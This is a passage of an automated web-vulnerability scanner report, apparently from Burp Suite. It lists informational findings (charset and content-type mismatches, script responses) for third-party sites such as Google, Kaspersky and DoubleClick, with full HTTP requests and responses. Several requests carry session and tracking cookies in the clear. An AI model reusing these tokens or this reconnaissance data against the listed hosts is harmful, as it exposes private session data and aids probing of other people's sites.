24.20. http://p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com
Path:	/intl/en/ipv6/exp/iframe.html

Request

GET /intl/en/ipv6/exp/iframe.html HTTP/1.1
Host: p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
Referer: http://p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=XU0IQAZklWhyhWdlymBvdCxVkSIFK9aUlYUQMFi34UxO1ecYTEfO4ZrKByNclFfOyvF5AaGDzivPGm42OGxJA3ND_Gd1jskTnbkzYzvsb4F6P5IHltVNnazrs6Pi8hSq

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Tue, 19 Jul 2011 09:12:38 GMT
Date: Sun, 04 Sep 2011 12:34:36 GMT
Expires: Sun, 04 Sep 2011 12:34:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 2298
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<script type=text/javascript>
(function() {

var f=this,g=function(b,d){var a=b.split("."),c=f;!(a[0]in c)&&c.execScript&&c.execScript("var
...[SNIP]...

24.21. http://p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com
Path:	/intl/en/ipv6/exp/redir.html

Request

GET /intl/en/ipv6/exp/redir.html HTTP/1.1
Host: p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1313965654&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2F4.16.2011-xss-cross-site-scripting-dork-poc-example-report-vulnerable-server.html&dt=1315139700374&bpp=28&shv=r20110824&jsv=r20110719&correlator=1315139700415&frm=4&adk=1607234649&ga_vid=1520838230.1315139700&ga_sid=1315139700&ga_hid=1936672634&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1049&bih=910&ref=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html&fu=0&ifi=1&dtd=45&xpc=HQEB98vPlM&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=XU0IQAZklWhyhWdlymBvdCxVkSIFK9aUlYUQMFi34UxO1ecYTEfO4ZrKByNclFfOyvF5AaGDzivPGm42OGxJA3ND_Gd1jskTnbkzYzvsb4F6P5IHltVNnazrs6Pi8hSq

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Sun, 04 Sep 2011 12:34:34 GMT
Expires: Sun, 04 Sep 2011 12:34:34 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 216
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv='refresh' content='0;URL=iframe.html' />
</head>

<body>
<script type=text/javascript>document.location.replace('iframe.html');</script>

...[SNIP]...

24.22. http://sourceforge.net/mailarchive/message.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/mailarchive/message.php

Request

GET /mailarchive/message.php HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-24
Content-type: text/html
Connection: close
Date: Sun, 04 Sep 2011 14:02:20 GMT
Server: lighttpd/1.4.26
Content-Length: 8895

<!doctype html>


<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

24.23. http://techtarget-www.baynote.net/baynote/tags3/common previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://techtarget-www.baynote.net
Path:	/baynote/tags3/common

Request

GET /baynote/tags3/common HTTP/1.1
Host: techtarget-www.baynote.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: BNServer
Accept-Ranges: bytes
ETag: W/"172-1314239748000"
Last-Modified: Thu, 25 Aug 2011 02:35:48 GMT
Content-Type: text/html
Content-Length: 172
Date: Sun, 04 Sep 2011 14:04:00 GMT
Connection: close

<html>
<head>
<title>Internal Error</title>
</head>
<body>
<h1>HTTP Status 500</h1>
<p>The server is unable to fulfill this request</p>
</body>
</html>

24.24. http://wd.sharethis.com/api/getCount2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.spamfighter.com%2FNews-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 12:13:05 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 342

(function(){stButtons.processCB({"url":"http:\/\/www.spamfighter.com\/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm","email":1,"linkedin":3,"facebook":1,"twitter"
...[SNIP]...

24.25. https://ws.sharethis.com/api/getCount2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ws.sharethis.com
Path:	/api/getCount2.php

Request

GET /api/getCount2.php HTTP/1.1
Host: ws.sharethis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: text/html
Expires: Sun, 04 Sep 2011 14:05:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:05:47 GMT
Content-Length: 73
Connection: close

(function(){({"error":true,"errorMessage":"Epic Fail2","ourl":null})})();

24.26. http://www.cwsubscribe.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cwsubscribe.com
Path:	/favicon.ico

Request

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:55:01 GMT
Server: WebSitePro/2.5.8
Accept-ranges: bytes
Content-type: text/html
Content-length: 228

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/favicon.ico<P>(E:\WebSite\computerworld\favicon.ic
...[SNIP]...

24.27. http://www.digitalriver.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digitalriver.com
Path:	/

Request

GET / HTTP/1.1
Host: www.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389

Response

HTTP/1.1 200 OK
ETag: "417-4739f61d"
Content-Type: text/html
Last-Modified: Tue, 13 Nov 2007 19:08:13 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server (Unix) mod_plsql/10.1.3.1.0 mod_ossl/10.1.3.0.0 mod_perl/1.29 OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=1708;ecid=23859425184,0)
Content-Length: 1047
Date: Thu, 01 Sep 2011 07:16:02 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: cw0301@dc1com03
Accept-Ranges: bytes

<HTML><HEAD><TITLE>Digital River...</TITLE>
<META HTTP-EQUIV="REFRESH" CONTENT="2;URL=http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home">
<SCRIPT LANGU
...[SNIP]...

24.28. http://www.sophelle.com/graphic/bullet-sm-w.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/graphic/bullet-sm-w.gif

Request

GET /graphic/bullet-sm-w.gif HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Company/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotdt=2011-09-04%2010%3A56%3A09; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.8.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:54 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

24.29. http://www.sophelle.com/images/sophelle-ico.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/images/sophelle-ico.ico

Request

GET /images/sophelle-ico.ico HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotdt=2011-09-04%2010%3A56%3A01; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.4.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:25 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

24.30. http://www.whatisnetwork.com/wp-admin/admin-ajax.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/wp-admin/admin-ajax.php

Request

GET /wp-admin/admin-ajax.php HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:16:31 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 2

-1

25. HTML uses unrecognised charset previous next
There are 3 instances of this issue:

/
/406.shtml
/themes/maasweb2011/css/form.css

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

25.1. http://www.maas360.com/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.maas360.com
Path:	/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

"utf-8"
utf-8

Request

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:34:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 04-Sep-2010 14:34:50 GMT; path=/; httponly
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 04-Sep-2010 14:34:50 GMT; path=/; httponly
Content-Type: text/html; charset="utf-8"
Content-Length: 39447

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="Chrome Chrome_535">
<!--
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3
...[SNIP]...
</title>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="keywords" content="" />
...[SNIP]...

25.2. http://www.maas360.com/406.shtml previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.maas360.com
Path:	/406.shtml

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

"utf-8"
utf-8

Request

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 04-Sep-2010 14:34:40 GMT; path=/; httponly
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 04-Sep-2010 14:34:40 GMT; path=/; httponly
Content-Type: text/html; charset="utf-8"
Content-Length: 39447

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="Chrome Chrome_535">
<!--
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3
...[SNIP]...
</title>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="keywords" content="" />
...[SNIP]...

25.3. http://www.maas360.com/themes/maasweb2011/css/form.css previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.maas360.com
Path:	/themes/maasweb2011/css/form.css

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

"utf-8"
utf-8

Request

Response

26. Content type incorrectly stated previous next
There are 46 instances of this issue:

http://ad.doubleclick.net/clk
http://ads.pointroll.com/PortalServe/
http://amch.questionmarket.com/adscgen/d_layer.php
http://amch.questionmarket.com/adscgen/dynamiclink.js.php
http://ar.voicefive.com/b/rc.pli
http://blogs.computerworld.com/favicon.ico
http://blogs.computerworld.com/sites/default/themes/cw_blogs/images/favicon.ico
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cdn.i.haymarket.net.au/Utils/ImageResizer.ashx
https://chat.livechatinc.net/licence/1019931/tunnel.cgi
http://corporate.digitalriver.com/favicon.ico
http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage
http://drh.img.digitalriver.com/DRHM/Storefront/Site/digriv/cm/multimedia/HomeFlash/xml/coverItems_2011-02-21.xml
http://drh.img.digitalriver.com/store
http://i.haymarket.net.au/Utils/ImageResizer.ashx
http://news.gmane.org/find-root.php
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://office.microsoft.com/search/toc14.aspx
http://rt.disqus.com/forums/realtime-cached.js
http://rt.trafficfacts.com/tf.php
http://s0.2mdn.net/2524173/BRAND_CDWG_DEFAULT_NA_728x90_A.jpg
http://sophelle.app5.hubspot.com/salog.js.aspx
http://spd.pointroll.com/Platform/PRScript.svc/PRScript
http://st.madisonlogic.com/images/userlogo/2/2745_INFOR-Logo-2010.gif
http://st.madisonlogic.com/images/userlogo/3/3587_scality_logo.jpg
http://st.madisonlogic.com/images/userlogo/5/596_interactive-intelligence.jpg
https://store.digitalriver.com/favicon.ico
http://support.kasperskyamericas.com/favicon.ico
http://support.kasperskyamericas.com/sites/default/files/kaspersky_usatheme_favicon.ico
http://techtarget-www.baynote.net/baynote/tags3/common
http://urls.api.twitter.com/1/urls/count.json
http://usa.kaspersky.com/favicon.ico
http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico
http://usa.kaspersky.com/system/lightbox2/filter-xss
http://wd.sharethis.com/api/getCount2.php
http://wd.sharethis.com/api/sharer.php
https://ws.sharethis.com/api/getCount2.php
http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx
http://www.facebook.com/extern/login_status.php
http://www.google.com/mbd
http://www.google.com/search
http://www.networkworld.com/favicon.ico
http://www.scmagazine.com.au/t.ashx
http://www.sophelle.com/graphic/cq_logo-250.gif
http://www.whatisnetwork.com/wp-admin/admin-ajax.php

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sun, 04 Sep 2011 13:59:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

26.2. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.3. http://amch.questionmarket.com/adscgen/d_layer.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://amch.questionmarket.com
Path:	/adscgen/d_layer.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.4. http://amch.questionmarket.com/adscgen/dynamiclink.js.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://amch.questionmarket.com
Path:	/adscgen/dynamiclink.js.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.5. http://ar.voicefive.com/b/rc.pli previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p82806590&1315138474230 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; BMX_3PC=1; BMX_BR=pid=p82806590&prad=67008629&arc=40380915&exp=1315138417; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1315138425%2E221%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 12:13:56 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

26.6. http://blogs.computerworld.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.computerworld.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: blogs.computerworld.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:18:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 00:02:33 GMT
ETag: "4d4304-57e-49fbc02979840"
Accept-Ranges: bytes
Cteonnt-Length: 1406
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 12:18:05 GMT
Cneonction: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 1406

..............h.......(....... ...................................\...Y....!"./AD.....;QU.#13....Rrw.n...z...^...p...Gbf.W...e...f.......g...l...h.......q...h...^...^...j...f...b.......X...e.........
...[SNIP]...

26.7. http://blogs.computerworld.com/sites/default/themes/cw_blogs/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.computerworld.com
Path:	/sites/default/themes/cw_blogs/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/default/themes/cw_blogs/images/favicon.ico HTTP/1.1
Host: blogs.computerworld.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ad93eb1sjsmavv7lb6dbeo6005; mobify=0; __switchTo5x=100; __unam=8eb1eeb-132345c7bf3-4ee6c456-1; s_pers=%20s_pv%3DBlog%253A%2520Post%253A%2520Happy%2520hackers%2520attack%2520sites%252C%2520submit%2520hacks%2520for%2520ratings%2520on%2520RankMyHack%7C1315140273658%3B; idglg_ref_domain=google.com; __utma=226201545.739689705.1315138474.1315138474.1315138474.1; __utmb=226201545.1.10.1315138474; __utmc=226201545; __utmz=226201545.1315138474.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=%22xss.cx%22; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D19%3B

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 00:02:27 GMT
ETag: "4d418f-57e-49fbc023c0ac0"
Accept-Ranges: bytes
Cteonnt-Length: 1406
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 12:17:49 GMT
Cneonction: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 1406

..............h.......(....... ...................................\...Y....!"./AD.....;QU.#13....Rrw.n...z...^...p...Gbf.W...e...f.......g...l...h.......q...h...^...^...j...f...b.......X...e.........
...[SNIP]...

26.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.9. http://cdn.i.haymarket.net.au/Utils/ImageResizer.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.i.haymarket.net.au
Path:	/Utils/ImageResizer.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /Utils/ImageResizer.ashx?n=http%3a%2f%2fi.haymarket.net.au%2fGalleries%2f20110610023338_blingmodel2_shutterstock_74998558+copy.jpg&h=78&w=65&c=1 HTTP/1.1
Host: cdn.i.haymarket.net.au
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:12:54 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n58 ( lax-agg-n21), ht-d lax-agg-n21.panthercdn.com
Cache-Control: max-age=259200
Expires: Wed, 07 Sep 2011 00:33:32 GMT
Age: 41962
Content-Length: 1784
Content-Type: image/jpeg
Content-Disposition: inline; filename=1_78_65_http://i.haymarket.net.au/Galleries/20110610023338_blingmodel2_shutterstock_74998558 copy.jpg
Connection: keep-alive

......JFIF.....`.`.....C........... .
